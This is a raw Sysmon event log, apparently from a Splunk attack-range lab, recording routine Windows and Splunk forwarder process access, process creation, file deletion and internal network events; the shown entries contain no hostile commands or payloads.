C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222629Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222628Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222627Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1945-6216-4505-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222626Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222625Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222624Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222623Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222622Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1945-6216-4505-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222621Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222620Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.492{4F8D34B0-1945-6216-4505-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000222619Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.257{4F8D34B0-1944-6216-4405-000000003902}1164708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222618Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.116{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C77797756C0C27259A95156502E3900,SHA256=59790C018331C5D3E56B8AE30A776639387826020987077619312E6A1CC29D30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222635Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:50.131{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=164EAD485B04739C71ADE7CAE83105DC,SHA256=6609FEAAEAFBB973052E36DE05DDC1F86DDD562513289298F69EBCB237B88DDA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:48.617{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49558-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000222634Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:50.053{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93CCD6864FF65ECCBF74E384A733EEBB,SHA256=F50170F9D89094F3CA3442200128EAB0D1608E5FA098E4303BFBC47CE51B1D1F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222650Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.697{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51729-false10.0.1.12-8000- 10341000x8000000000000000222649Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1947-6216-4605-000000003902}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222648Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222647Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222646Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222645Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222644Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222643Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222642Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222641Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222640Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222639Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1947-6216-4605-000000003902}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222638Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.256{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1947-6216-4605-000000003902}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222637Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.257{4F8D34B0-1947-6216-4605-000000003902}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 